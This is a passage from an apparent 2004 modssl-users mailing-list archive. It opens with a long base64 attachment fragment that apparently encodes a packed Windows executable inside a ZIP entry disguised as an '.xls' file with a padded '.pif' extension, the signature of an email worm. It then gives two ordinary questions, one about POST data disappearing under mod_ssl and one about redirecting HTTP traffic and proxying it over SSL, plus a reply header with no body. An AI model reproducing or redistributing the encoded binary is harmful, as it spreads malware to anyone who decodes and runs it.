AACKB0cs6DwBd/eAPwR18osHil8EZsHoCMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+ALAAAIsHCcB0
RYtfBI2EMOjRAAAB81CDxwj/lmDSAACVigdHCMB03In5eQcPtwdHUEe5V0jyrlX/lmTSAAAJwHQH
iQODwwTr2P+WaNIAAGHpcYT//wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAAAAAAAAAAAQABAAAA
OAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAUAAAAKjgAAAoAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
AAAAoAAAgHgAAIAAAAAAAAAAAAAAAAAAAAEACQQAAJAAAADU4QAAFAAAAAAAAAAAAAAAAQAwALCw
AAAoAAAAEAAAACAAAAABAAQAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICA
AIAAAACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAiIiIAAAA
AAiHd3d4gAAAeP//iIdwAAB494///3gAAHj/////eAAAePd3eP94AAB4/////3gAAHj3d3j/eAAA
eP////94AAB493eP/3gAAHj/////eAAAeP////94AAB4f39/f3gAAIdzh4eHgAAAB7M7e3eAAAAA
AAAAgAAA8D8AAOAHAADABwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMA
AMAHAADgBwAA/98AANixAAAAAAEAAQAQEBAAAQAEACgBAAABAAAAAAAAAAAAAAAAAJDiAABg4gAA
AAAAAAAAAAAAAAAAneIAAHDiAAAAAAAAAAAAAAAAAACq4gAAeOIAAAAAAAAAAAAAAAAAALXiAACA
4gAAAAAAAAAAAAAAAAAAwOIAAIjiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMriAADY4gAA6OIAAAAA
AAD24gAAAAAAAATjAAAAAAAADOMAAAAAAABzAACAAAAAAEtFUk5FTDMyLkRMTABBRFZBUEkzMi5k
bGwATVNWQ1JULmRsbABVU0VSMzIuZGxsAFdTMl8zMi5kbGwAAExvYWRMaWJyYXJ5QQAAR2V0UHJv
Y0FkZHJlc3MAAEV4aXRQcm9jZXNzAAAAUmVnQ2xvc2VLZXkAAABtZW1zZXQAAHdzcHJpbnRmQQAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
AABfiAAAAAA=

------=_NextPart_000_0007_94D588AE.1C808A56--



From owner-modssl-users@modssl.org  Thu Feb 26 05:32:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D2658A8975; Thu, 26 Feb 2004 05:32:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fed1mtao06.cox.net (fed1mtao06.cox.net [68.6.19.125])
	by master.modssl.org (Postfix) with ESMTP id DB099A8937
	for ; Thu, 26 Feb 2004 05:32:40 +0100 (CET)
Received: from FRONTSEAT.rollercoaster.com ([68.3.199.36])
          by fed1mtao06.cox.net
          (InterMail vM.5.01.06.08 201-253-122-130-108-20031117) with ESMTP
          id <20040226043237.VSHE25273.fed1mtao06.cox.net@FRONTSEAT.rollercoaster.com>
          for ; Wed, 25 Feb 2004 23:32:37 -0500
Message-Id: <6.0.1.1.2.20040225211718.03b721c8@rollercoaster.com>
X-Sender: jim@rollercoaster.com@rollercoaster.com
X-Mailer: QUALCOMM Windows Eudora Version 6.0.1.1
Date: Wed, 25 Feb 2004 21:34:12 -0700
To: modssl-users@modssl.org
From: Jim Serio 
Subject: POST data disappearing
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jim Serio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All.

I have the following setup:

Apache/1.3.27 (Unix) - Linux
mod_ssl/2.8.14 (using mm)
OpenSSL/0.9.6b
PHP/4.3.1

SSL and non-SSL sites are running on the same instance of Apache.

While working on a PHP-based form I noticed that on random occasions POSTed 
data will completely disappear.. as if it was the first time the user 
visited the page. After days of trying to resolve the issue, I ended up 
just writing a simple form (see below). It was still intermittent though 
but I began to notice a pattern. If I uploaded the file (overwriting it) 
then the POST data disappeared. BTW.. this was on the SSL-enabled virtual 
host. When tested on the non-SSL-enabled virtual host (running under the 
same instance of Apache) I did not run into the problem. I also tested out 
previous scripts on the SSL-enabled host and, to my shock, discovered the 
same problem!

Tonight I have finally been able to re-create the problem. I can submit 
data into the form (the test form below just posts to itself and displays 
the posted data, along with the POST array) numerous times and the data 
will remain the same or change if I change it. However, if I "touch" the 
file or overwrite it, the next time I submit the form, the POST data is 
gone. Nothing. Ziltch. I can consistently duplicate this on the SSL-enabled 
host but it never happens on the non-SSL-enabled host, leaving me to 
believe it may be a problem with mod_ssl or some program it's compiled 
against (mm, perhaps?). I looked into any cache options but the only one, 
SSLSessionCache, is not set, so I assume it's set to the default: none.

Has anyone encountered this problem and have a solution?

Below is a sample script which exhibits the problem. You can test it by 
following the steps:

First fill out the form and sumbit. Wait about a minute and either 'touch 
debug.php' or overwrite it. Then resubmit and everything will clear out. 
I'd appreciate it if some of you could test this and see if you get the 
same result.

-----BEGIN debug.php-----



-----END debug.php-----


Jim

--
Jim Serio - jim@rollercoaster.com 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 26 20:25:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1D996A8976; Thu, 26 Feb 2004 20:25:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sphinx.gsu.edu (sphinx.gsu.edu [131.96.2.23])
	by master.modssl.org (Postfix) with ESMTP id 212C0A8939
	for ; Thu, 26 Feb 2004 20:25:09 +0100 (CET)
Received: from zim.gsu.edu (zim.gsu.edu [131.96.234.45])
	by sphinx.gsu.edu (8.11.7+Sun/8.10.2) with ESMTP id i1QJP7n25184
	for ; Thu, 26 Feb 2004 14:25:07 -0500 (EST)
Received: (from sysmda@localhost)
	by zim.gsu.edu (8.11.7p1+Sun/8.11.7) id i1QJP7U22356
	for modssl-users@modssl.org; Thu, 26 Feb 2004 14:25:07 -0500 (EST)
Date: Thu, 26 Feb 2004 14:25:07 -0500
From: Mike Alberghini 
To: modssl-users@modssl.org
Subject: Redirecting and proxying through ssl
Message-ID: <20040226192507.GA22210@zim.gsu.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Alberghini 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm in charge of a box here that's running multiple apache servers.
I run the front end servers which handle the front end and proxying.
The third apache server is run by another group and interfaces with
backend databases and other apps.  

Here's what everying does:

1.  Server1 runs on port 80 and redirects all traffic to port 443 as https
2.  Server2 runs on port 443 does nothing but proxy to the third server
    running on port 7900
3.  Server3 interfaces with a bunch of apps.  I can't touch it.

I want to combine the first two servers.  I want one apache server that
redirects all port 80 http traffic to port 443 https traffic and then
proxies everything through SSL to the server on port 7900.

Is this possible?  Right now when I try to combine a Rewrite for port 80 with
a proxy on 443 the proxy takes over all traffic before the rewrite can trigger.

I've tried putting the rewrite and the proxy in seperate virtual hosts with 
no luck either.

-- 
Michael Alberghini
Software Systems Engineer
Georgia State University
mike@gsu.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 26 22:43:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E5A1DA8975; Thu, 26 Feb 2004 22:43:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60706.mail.yahoo.com (web60706.mail.yahoo.com [216.109.117.229])
	by master.modssl.org (Postfix) with SMTP id 09C39A8937
	for ; Thu, 26 Feb 2004 22:43:28 +0100 (CET)
Message-ID: <20040226214326.24502.qmail@web60706.mail.yahoo.com>
Received: from [62.129.121.33] by web60706.mail.yahoo.com via HTTP; Thu, 26 Feb 2004 13:43:26 PST
Date: Thu, 26 Feb 2004 13:43:26 -0800 (PST)
From: Matt Stevenson 
Subject: Re: Redirecting and proxying through ssl
To: modssl-users@modssl.org
Cc: sysmda@zim.gsu.edu
In-Reply-To: <20040226192507.GA22210@zim.gsu.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

